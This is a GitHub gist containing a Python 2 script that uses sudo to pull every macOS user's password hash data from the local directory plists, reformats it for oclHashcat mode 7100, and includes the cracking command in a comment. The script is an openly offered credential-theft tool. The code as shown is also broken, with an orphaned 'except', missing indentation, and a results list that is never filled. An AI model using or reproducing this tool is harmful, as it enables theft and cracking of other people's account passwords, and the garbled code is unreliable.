Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
# extracts OSX user hashes and outputs a format crackable with oclHashcat
# adapted from
# and
# automation of approach by @harmj0y
# sudo ./
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt
import os, base64
from xml.etree import ElementTree
def getUserHash(userName):
raw = os.popen('sudo defaults read /var/db/dslocal/nodes/Default/users/%s.plist ShadowHashData|tr -dc 0-9a-f|xxd -r -p|plutil -convert xml1 - -o - 2> /dev/null' %(userName)).read()
if len(raw) > 100:
root = ElementTree.fromstring(raw)
children = root[0][1].getchildren()
entropy64 = ''.join(children[1].text.split())
iterations = children[3].text
salt64 = ''.join(children[5].text.split())
entropyRaw = base64.b64decode(entropy64)
entropyHex = entropyRaw.encode("hex")
saltRaw = base64.b64decode(salt64)
saltHex = saltRaw.encode("hex")
return (userName, "ml$%s$%s$%s" %(iterations, saltHex, entropyHex))
except Exception as e:
print "getUserHash() exception: %s" %(e)
userNames = [ plist.split(".")[0] for plist in os.listdir('/var/db/dslocal/nodes/Default/users/') if not plist.startswith('_')]
userHashes = []
for userName in userNames:
userHash = getUserHash(userName)
print userHashes
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.